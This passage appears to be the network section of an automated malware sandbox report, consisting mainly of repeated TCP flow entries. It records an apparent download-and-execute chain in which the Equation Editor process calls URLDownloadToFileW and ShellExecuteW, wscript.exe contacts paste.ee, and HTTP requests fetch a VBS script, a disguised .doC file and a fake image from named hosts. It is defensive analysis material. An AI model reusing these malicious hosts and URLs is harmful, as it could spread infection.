Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 91.92.244.96:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 91.92.244.96:80
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49169

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\wscript.exe	Network Connect: 104.21.84.67 443			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Domain query: paste.ee

Connects to a pastebin service (likely for C&C)

Source: unknown	DNS query: name: paste.ee
Source: unknown	DNS query: name: paste.ee

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 12_2_035306A2 URLDownloadToFileW,ShellExecuteW,ExitProcess,

12_2_035306A2

Source: global traffic

HTTP traffic detected: GET /images/004/738/994/original/new_image_vbs_updated.jpg?1707769907 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.21.84.67 104.21.84.67
Source: Joe Sandbox View	IP Address: 172.67.215.45 172.67.215.45

Source: Joe Sandbox View	ASN Name: THEZONEBG THEZONEBG
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d

Source: global traffic	HTTP traffic detected: GET /d/kmRFs HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
Source: global traffic	HTTP traffic detected: GET /LEO/CLO/microballonupdationrpcessstartedforbabiesupdateveryfastandamazingupdationforentierpctomakeitfasterthan.doC HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.92.244.96Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /LEO/Leoloverme.vbs HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.92.244.96Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /d/kmRFs HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee

Source: unknown	HTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.215.45:443 -> 192.168.2.22:49169 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.244.96
